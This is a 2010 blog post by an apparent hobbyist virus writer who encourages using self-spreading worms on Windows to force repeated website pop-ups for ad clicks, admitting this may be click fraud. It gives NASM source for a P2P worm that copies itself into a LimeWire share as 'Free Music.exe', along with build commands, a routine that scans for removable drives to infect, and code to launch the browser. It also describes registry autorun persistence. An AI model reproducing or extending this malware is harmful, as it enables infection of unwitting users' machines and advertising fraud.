2010/08/31

Marketing in the *new* age using virii and worms for profit

I have coded bots, worms, virii and anything I can wrap my head around
of them all biological worms and virii are unique. But this post is
not about biocode
am talking about marketing with bots, I have seen one bot that does
this but it has a stupid payload and attacks too strong. Anyway am
here to discuss and show how to market successfully with a virus/worm.

I guess if this becomes a good technique the corporate greeds will
legalize coding virii and worms \0/ for business purposes o_O lol.

You may wonder why is this necessary, well einstein; some of us are
programmers(aka nerds) and when we are done coding a cool project,
marketing it becomes a heck of a job especially when everything we say
is technical also when you want to make money with Google AdSense this
is a vey good option. may be considered click fraud but hey you showed
them and they clicked who's to blame the interested client or the
coder ^_^

The whole idea is infect a system copy self to windir PS: most virii
and worms meant to do some sought of public announcements or activism
target consumer OSes and the head is windows it doesn't mean we hate
windows it means; thats where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.

So as I was saying the idea is when our child first gets to a
compatible system in this case windows it must first copy itself to
the Windows Directory then maybe write a registry rule to make it run
first when the system boots run child2(the one in the windir) and exit
child1 from probably a flash drive. now you can Winexec your site
which will in windows fire up the default browser with the address you
supplied and the user sees magic hey there's a site here lets see or
they may close it but if it keeps poping up like a TV ad they will
give in believe me I have studied psychology :D

you may now infect other removable drives and exes to spread around
quickly you may also spread through p2p ^^

Here is code for a p2p worm in asm(NASM)
PS: I don't even have to show this only a
*fool* wouldn't know how to spread hehe.

;############################
; This is in asm(NASM)      #
; compiled under OpenBSD4.6 #
;                           #
; lame p2p worm             #
;############################
[bits 32]
[global main]

[extern CopyFileA]
[extern ExitProcess]
[extern GetModuleHandleA]
[extern GetModuleFileNameA]

[segment code public use32 class='CODE']
 main:
    call [lame]
lame:
    pop     ebp
    sub  ebp, [lame]            ; w00t you don't know this << o_O

    call [ebp+GetModuleHandleA]

    push  dword [ebp+szpath]
    push  dword eax
    call  [ebp+GetModuleFileNameA]

    push  dword 0x00000000
    push  dword [ebp+fake]
    push  dword [ebp+szpath]
    call  [ebp+CopyFileA]
   
    push dword 0x00000000
    call [ebp+ExitProcess]

[segment data public use32 class='DATA']
szpath      db 0x00000000
            times 0x00000100-$+szpath db 0 ; 256d

fake      db "C:\Progra~1\LimeWire\Free Music.exe", 0

This code is fully functional but not good :(
fake can be collect from many of the warez sites and stuff like
that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main

For the alink you can download the old version and port it or wait for
me to release my port which has some funny errors
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3

This is because am using strlcpy with a pointer as size and also am
compiling with
cc -O2 -pipe  -Wall -Werror -Wstrict-prototypes -c alink.c

if I take off -Werror -Wstrict-prototypes everything works fine I'll
think about releasing it like that or corrected :)

Anyway how to spread with removable drives I have all the code but I
don't want to copy and share :( I'll share when I perfect it.

a little snippet though

...
    mov   word [ebp+szletter], 0x00000041 ; letter 'A'

seekem:
    mov   ecx, dword [ebp+szletter]
    mov   byte [ebp+szdrv], cl       ; lol nice eh?
   
    push  dword [ebp+szdrv]
    call  [ebp+GetDriveTypeA]

    cmp   eax, DRIVE_REMOVABLE
    je    eatit                    ; All removable Drives are mine
    inc   dword [ebp+szletter]
    cmp   word [ebp+szletter], 0x0000005a ; letter 'Z'
    jg    sleep_alil               ; should be sleep drives come and
                                   ; go u know :) Update:2010/06/15
                                   ; now we sleep hehe
    jmp   seekem

sleep_alil:
    push  0x00000014 ; 20 seconds ^^
    call  [ebp+Sleep]

    jmp   seekem     ; get back to work you idio

; Heres where you infect
eatit:
...


lol cool huh

ok so with that you get a lot of clicks and attention I think am tired
I'l continue later I think :D

oh I forgot the Winexec hehe

    push dword 0x00000005        ; SW_SHOW
    push dword [ebp+sitename]    ; eg http://www.google.com
    call [ebp+Winexec]

   
or if you want to use ShellExecute

    push dword 0x00000005        ; SW_SHOW        hehe
    push dword 0x00000000        ; [directory]   not needed
    push dword 0x00000000        ; [parameters]  not needed
    push dword [ebp+sitename]    ; [sitename] eg http://www.google.com
    push dword 0x00000000        ;
    push dword 0x00000000        ; [hwnd]
    call [ebp+ShellExecute]


Choose your weapon, Remember that writing these creatures(our children)
is an art so take time and don't make them hazardous
take them as you little army if you have ever taken Ninjutsu lessons
from a good *master* he trains you with discipline first spiritually
and physically code with passion and you will happy forever.

Happy hacking push that processor to the extreme :)

No comments:

Post a Comment